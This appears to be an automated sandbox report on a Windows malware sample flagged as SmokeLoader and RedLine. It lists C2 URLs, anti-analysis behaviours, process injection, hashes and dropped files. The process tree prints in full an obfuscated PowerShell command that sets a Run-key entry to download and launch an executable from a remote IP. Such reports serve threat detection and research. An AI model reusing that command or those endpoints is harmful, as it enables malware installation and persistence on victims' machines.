Analysis
-
max time kernel
150s -
max time network
198s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
13-08-2021 06:45
Static task
static1
Behavioral task
behavioral1
Sample
3da56853cea772e7f90f92c66d8c0a31.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
3da56853cea772e7f90f92c66d8c0a31.exe
Resource
win10v20210408
General
-
Target
3da56853cea772e7f90f92c66d8c0a31.exe
-
Size
320KB
-
MD5
3da56853cea772e7f90f92c66d8c0a31
-
SHA1
45a659f9006fb9703a1fef5fc9044a84788228ef
-
SHA256
776124547155ae68a2dac2b106f6aa8d39b2e71a3b11ca6241a7e305fa03605a
-
SHA512
0003c3fb6dab98f79f0fda8bd33140e9c35fc37ea4407dfdc930170f227d9209adbbbfeb96b9a41fc3ed5cfe44d716a74ff21222ec18e598db9de92a6d5ad9c8
Malware Config
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 6 IoCs
Processes:
E012.exeE448.exeRuntimebroker.exeE736.exeEBC9.exeF5E7.exepid process 956 E012.exe 552 E448.exe 1112 Runtimebroker.exe 1472 E736.exe 1572 EBC9.exe 788 F5E7.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
F5E7.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion F5E7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion F5E7.exe -
Deletes itself 1 IoCs
Processes:
pid process 1292 -
Drops startup file 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe -
Loads dropped DLL 2 IoCs
Processes:
E448.exepid process 552 E448.exe 552 E448.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\F5E7.exe themida behavioral1/memory/788-94-0x00000000001D0000-0x00000000001D1000-memory.dmp themida -
Processes:
F5E7.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA F5E7.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
F5E7.exepid process 788 F5E7.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
3da56853cea772e7f90f92c66d8c0a31.exedescription pid process target process PID 1672 set thread context of 1384 1672 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
3da56853cea772e7f90f92c66d8c0a31.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3da56853cea772e7f90f92c66d8c0a31.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3da56853cea772e7f90f92c66d8c0a31.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3da56853cea772e7f90f92c66d8c0a31.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
3da56853cea772e7f90f92c66d8c0a31.exepid process 1384 3da56853cea772e7f90f92c66d8c0a31.exe 1384 3da56853cea772e7f90f92c66d8c0a31.exe 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 1292 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 1292 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
3da56853cea772e7f90f92c66d8c0a31.exepid process 1384 3da56853cea772e7f90f92c66d8c0a31.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
F5E7.exedescription pid process Token: SeShutdownPrivilege 1292 Token: SeShutdownPrivilege 1292 Token: SeDebugPrivilege 788 F5E7.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process 1292 1292 1292 1292 -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
pid process 1292 1292 1292 1292 1292 1292 -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
E012.exepid process 956 E012.exe -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
3da56853cea772e7f90f92c66d8c0a31.exeE448.exeRuntimebroker.exeE736.exedescription pid process target process PID 1672 wrote to memory of 1384 1672 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 1672 wrote to memory of 1384 1672 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 1672 wrote to memory of 1384 1672 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 1672 wrote to memory of 1384 1672 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 1672 wrote to memory of 1384 1672 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 1672 wrote to memory of 1384 1672 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 1672 wrote to memory of 1384 1672 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 1292 wrote to memory of 956 1292 E012.exe PID 1292 wrote to memory of 956 1292 E012.exe PID 1292 wrote to memory of 956 1292 E012.exe PID 1292 wrote to memory of 956 1292 E012.exe PID 1292 wrote to memory of 552 1292 E448.exe PID 1292 wrote to memory of 552 1292 E448.exe PID 1292 wrote to memory of 552 1292 E448.exe PID 1292 wrote to memory of 552 1292 E448.exe PID 552 wrote to memory of 1112 552 E448.exe Runtimebroker.exe PID 552 wrote to memory of 1112 552 E448.exe Runtimebroker.exe PID 552 wrote to memory of 1112 552 E448.exe Runtimebroker.exe PID 552 wrote to memory of 1112 552 E448.exe Runtimebroker.exe PID 1292 wrote to memory of 1472 1292 E736.exe PID 1292 wrote to memory of 1472 1292 E736.exe PID 1292 wrote to memory of 1472 1292 E736.exe PID 1292 wrote to memory of 1472 1292 E736.exe PID 1292 wrote to memory of 1572 1292 EBC9.exe PID 1292 wrote to memory of 1572 1292 EBC9.exe PID 1292 wrote to memory of 1572 1292 EBC9.exe PID 1292 wrote to memory of 1572 1292 EBC9.exe PID 1292 wrote to memory of 788 1292 F5E7.exe PID 1292 wrote to memory of 788 1292 F5E7.exe PID 1292 wrote to memory of 788 1292 F5E7.exe PID 1292 wrote to memory of 788 1292 F5E7.exe PID 1292 wrote to memory of 788 1292 F5E7.exe PID 1292 wrote to memory of 788 1292 F5E7.exe PID 1292 wrote to memory of 788 1292 F5E7.exe PID 1112 wrote to memory of 1220 1112 Runtimebroker.exe powershell.exe PID 1112 wrote to memory of 1220 1112 Runtimebroker.exe powershell.exe PID 1112 wrote to memory of 1220 1112 Runtimebroker.exe powershell.exe PID 1112 wrote to memory of 1220 1112 Runtimebroker.exe powershell.exe PID 1472 wrote to memory of 656 1472 E736.exe cmd.exe PID 1472 wrote to memory of 656 1472 E736.exe cmd.exe PID 1472 wrote to memory of 656 1472 E736.exe cmd.exe PID 1472 wrote to memory of 656 1472 E736.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\E012.exeC:\Users\Admin\AppData\Local\Temp\E012.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\E448.exeC:\Users\Admin\AppData\Local\Temp\E448.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
-
C:\Users\Admin\AppData\Local\Temp\E736.exeC:\Users\Admin\AppData\Local\Temp\E736.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat2⤵
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\EBC9.exeC:\Users\Admin\AppData\Local\Temp\EBC9.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\F5E7.exeC:\Users\Admin\AppData\Local\Temp\F5E7.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Runtimebroker.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\ProgramData\Runtimebroker.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\Users\Admin\AppData\Local\Temp\E012.exeMD5
a69e12607d01237460808fa1709e5e86
SHA14a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA5127533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
C:\Users\Admin\AppData\Local\Temp\E448.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\Users\Admin\AppData\Local\Temp\E448.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
C:\Users\Admin\AppData\Local\Temp\E736.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\E736.exeMD5
b19ac380411ed5d8b5a7e7e0c1da61a6
SHA19665c20336a5ce437bbf7b564370bfa43e99954c
SHA256aba88a19b2f6e2cf9a6a41ab8661d83c433acec363028f58dd74d37e335c7619
SHA51273b4e3555cf9496a7138a2c7071ed81a754493afaf15f604a305f3eb051ed72645731a6174b0934f24371dbe5bd8c0185516f87778a018d84df4fff8aea0c208
-
C:\Users\Admin\AppData\Local\Temp\EBC9.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\EBC9.exeMD5
5707ddada5b7ea6bef434cd294fa12e1
SHA145bb285a597b30e100ed4b15d96a29d718697e5e
SHA25685205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
SHA51291cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
-
C:\Users\Admin\AppData\Local\Temp\F5E7.exeMD5
717d65dba56f47e540dca074c3977b3d
SHA1d58aa30f826f41663e693f0ad930fdce584f1672
SHA25661fb1160ae372d9ba1c95400d5439450c6a66cdf073fa50ee2d5d10c4952cbb3
SHA512b06e4358411eb8f6315c574922c021bd57218b3e6a0ed727df6b44e20e7818d40fb0347050ce9145ea7e0fd56a7fa93a2358e524c0df030d6d44067c7c83510d
-
C:\Users\Admin\AppData\Local\Temp\s.batMD5
f47c5b33e235fdbd950b60d97b77b324
SHA15e683bd583add11bfa9bfbadc7f3e7d32ce753fa
SHA25688eb6fa824ca5a3435ff7746dbe891c99b42e072d7e43ffa9058063929ddd7dd
SHA51220756b4b413f789f7b67b448cbd223f2e658d1afc49ef6aa255e64bc19b934c9808d60f655e3c7803c8d29db7c0709f1acb453e02d172450e402ebce479eec0d
-
\ProgramData\Runtimebroker.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
\ProgramData\Runtimebroker.exeMD5
16e7880b76dbc82d50fd96f38d1c2692
SHA1b8b49ef406f74e50c7386f2fecbff18447ad9f4d
SHA2569ccef739ddc3b6688be2a72a754c95f300f24d3b5181a3896328681bf933b4d7
SHA51269071850ce17baaa5884f9531e2c7632b61a5777d58b826b1365d6f651f647a3521d456ceed29fbf5cf47ebf83176634371e7e5245a44d4b13b0855ffe10d6e3
-
memory/552-81-0x0000000000400000-0x0000000002C7D000-memory.dmpFilesize
40.5MB
-
memory/552-69-0x0000000000000000-mapping.dmp
-
memory/552-80-0x0000000000260000-0x000000000029B000-memory.dmpFilesize
236KB
-
memory/656-104-0x0000000000000000-mapping.dmp
-
memory/788-94-0x00000000001D0000-0x00000000001D1000-memory.dmpFilesize
4KB
-
memory/788-90-0x0000000000000000-mapping.dmp
-
memory/788-96-0x00000000009D0000-0x00000000009D1000-memory.dmpFilesize
4KB
-
memory/956-65-0x0000000000000000-mapping.dmp
-
memory/1112-82-0x0000000000400000-0x0000000002C7D000-memory.dmpFilesize
40.5MB
-
memory/1112-75-0x0000000000000000-mapping.dmp
-
memory/1220-98-0x0000000000000000-mapping.dmp
-
memory/1292-64-0x0000000002790000-0x00000000027A6000-memory.dmpFilesize
88KB
-
memory/1384-61-0x0000000000402E1A-mapping.dmp
-
memory/1384-62-0x00000000767B1000-0x00000000767B3000-memory.dmpFilesize
8KB
-
memory/1384-60-0x0000000000400000-0x0000000000409000-memory.dmpFilesize
36KB
-
memory/1472-100-0x0000000004F30000-0x0000000005141000-memory.dmpFilesize
2.1MB
-
memory/1472-78-0x0000000000000000-mapping.dmp
-
memory/1472-102-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/1472-89-0x0000000000400000-0x0000000002D86000-memory.dmpFilesize
41.5MB
-
memory/1472-87-0x0000000003020000-0x0000000003263000-memory.dmpFilesize
2.3MB
-
memory/1572-83-0x0000000000000000-mapping.dmp
-
memory/1572-101-0x0000000004910000-0x0000000004911000-memory.dmpFilesize
4KB
-
memory/1572-86-0x0000000000140000-0x0000000000141000-memory.dmpFilesize
4KB
-
memory/1672-63-0x0000000000020000-0x000000000002A000-memory.dmpFilesize
40KB